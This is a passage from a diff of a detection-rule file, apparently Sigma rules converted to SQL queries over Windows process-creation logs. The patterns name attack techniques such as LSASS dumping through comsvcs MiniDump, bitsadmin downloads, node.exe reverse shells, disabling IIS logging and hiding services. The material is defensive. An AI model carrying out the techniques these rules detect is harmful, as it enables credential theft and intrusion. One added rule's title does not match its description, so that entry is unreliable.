OR NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dashost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\defrag.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dwm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_system_exe_anomaly.yml" + "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" }, { - "title": "Suspicious Dump64.exe Execution", - "id": "129966c9-de17-4334-a123-8b58172e664d", - "status": "test", - "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", - "author": "Austin Songer @austinsonger, Florian Roth", + "title": "Suspicious Whoami.EXE Execution", + "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", + "status": "experimental", + "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Dump64.exe in other folders than the excluded one" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_dump64.yml" + "filename": "proc_creation_win_whoami_susp_flags.yml" }, { - "title": "RDP Connection Allowed Via Netsh.EXE", - "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "title": "Copy from Admin Share", + "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", "status": "test", - "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", - "author": "Sander Wiebing", + "description": "Detects a suspicious copy command to or from an Admin share or remote", + "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.lateral_movement", + "attack.collection", + "attack.exfiltration", + "attack.t1039", + "attack.t1048", + "attack.t1021.002" ], "falsepositives": [ - "Legitimate administration activity" + "Administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" + "filename": "proc_creation_win_susp_copy_lateral_movement.yml" }, { - "title": "APT29 2018 Phishing Campaign CommandLine Indicators", - "id": "7453575c-a747-40b9-839b-125a0aae324b", + "title": "Suspicious Double Extension File Execution", + "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", "status": "stable", - "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "Florian Roth (Nextron Systems), @41thexplorer", + "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", + "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%-noni -ep bypass $%' ESCAPE '\\' OR (CommandLine LIKE '%cyzfc.dat,%' ESCAPE '\\' AND CommandLine LIKE '%PointFunctionCall%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%.doc.exe' ESCAPE '\\' OR NewProcessName LIKE '%.docx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xls.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.txt.exe' ESCAPE '\\' OR NewProcessName LIKE '% .exe' ESCAPE '\\' OR NewProcessName LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR NewProcessName LIKE '%.doc.js' ESCAPE '\\' OR NewProcessName LIKE '%.docx.js' ESCAPE '\\' OR NewProcessName LIKE '%.xls.js' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.js' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.js' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.js' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.js' ESCAPE '\\' OR NewProcessName LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt29_phishing_campaign_indicators.yml" + "filename": "proc_creation_win_susp_double_extension.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation", - "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", - "status": "test", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Service DACL Abuse To Hide Services Via Sc.EXE", + "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", + "status": "experimental", + "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" + "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" }, { - "title": "Boot Configuration Tampering Via Bcdedit.EXE", - "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", - "status": "stable", - "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Disable Windows IIS HTTP Logging", + "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", + "status": "experimental", + "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", + "author": "frack113", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" + "filename": "proc_creation_win_iis_appcmd_http_logging.yml" }, { - "title": "Droppers Exploiting CVE-2017-11882", - "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "title": "Potential CVE-2021-26857 Exploitation Attempt", + "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", "status": "stable", - "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.execution", + "cve.2021.26857" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%WerFault.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2017_11882.yml" + "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" }, { - "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", - "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", - "status": "test", - "description": "Detects dump of credentials in VeeamBackup dbo", - "author": "frack113", + "title": "Privilege Escalation via Named Pipe Impersonation", + "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "status": "experimental", + "description": "Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", + "author": "Tim Rauch", "tags": [ - "attack.collection", - "attack.t1005" + "attack.lateral_movement", + "attack.t1021" ], "falsepositives": [ - "Unknown" + "Other programs that cause these patterns (please report)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" + "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference", - "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", - "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Run PowerShell Script from Redirected Input Stream", + "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", + "status": "test", + "description": "Detects PowerShell script execution via input stream redirect", + "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" ], - "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" + "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" }, { - "title": "Potential Arbitrary Code Execution Via Node.EXE", - "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "title": "File Download Via Bitsadmin To A Suspicious Target Folder", + "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", "status": "experimental", - "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" - ], - "filename": "proc_creation_win_node_abuse.yml" - }, - { - "title": "Suspicious Desktopimgdownldr Command", - "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", - "status": "test", - "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" }, { - "title": "Shells Spawned by Web Servers", - "id": "8202070f-edeb-4d31-a010-a26c72ac5600", - "status": "test", - "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", - "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1190" - ], + "title": "Suspicious Download from Office Domain", + "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", + "status": "experimental", + "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ - "Particular web applications may spawn a shell process legitimately" + "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\find.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hostname.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netdom.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE 